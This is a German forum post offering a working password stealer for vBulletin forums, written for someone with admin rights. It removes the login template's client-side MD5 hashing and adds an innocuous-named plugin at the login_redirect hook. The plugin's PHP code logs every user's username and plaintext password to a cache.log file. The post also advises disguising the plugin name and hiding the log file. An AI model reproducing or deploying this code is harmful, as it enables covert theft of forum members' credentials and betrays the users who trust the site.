Hallo,
habe eben in 5 Minuten ein Script geschrieben, was wie ein Passwordstealer für vBulletin funktioniert 😉 Bedingung ist, dass ihr einen Adminacc habt, der Rechte hat, Templates zu ändern und Plugins zu erstellen.
Zuerst geht ihr in die Style-Einstellungen und editiert das Template bei dem das Loginfeld ist (ist bei manchen Styles unterschiedlich, normalerweise „header“ oder „navbar“)
Dort sucht ihr folgende Zeile:
onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, $show[nopasswordempty])"
und entfernt sie. Das sorgt dafür, dass das Passwortfeld ausgelesen werden kann.
Nun müssen wir einen Hook erstellen. Klickt unten auf Addons & Plugins und dann auf „Plugin hinzufügen“.
Der Titel ist egal, sollte aber möglichst unauffällig sein. Sowas wie „Cache Management“ wäre zum Beispiel besser als „R0FL PaZZWorDLoGGaaa“.
Als Einstiegspunkt wählt ihr login_redirect.
Der PHP Code der nun noch hinzugefügt werden muss sieht wie folgt aus:
$pass = $_POST['vb_login_password'];
$username = $_POST['vb_login_username'];
$write = $username.':'.$pass.'
';
$connection = fopen('cache.log', 'a+');
fwrite($connection, $write);
fclose($connection);
Es wird nun username:pass in eine cache.log auf dem Server geschrieben.
Ihr könnt das natürlich noch modifizieren, indem ihr Pfad usw anpasst. Wäre auch ratsam, die Datei weiter im System zu verstecken.
Getestet mit vBulletin 3.7.* und 3.8.*
MfG
crashme 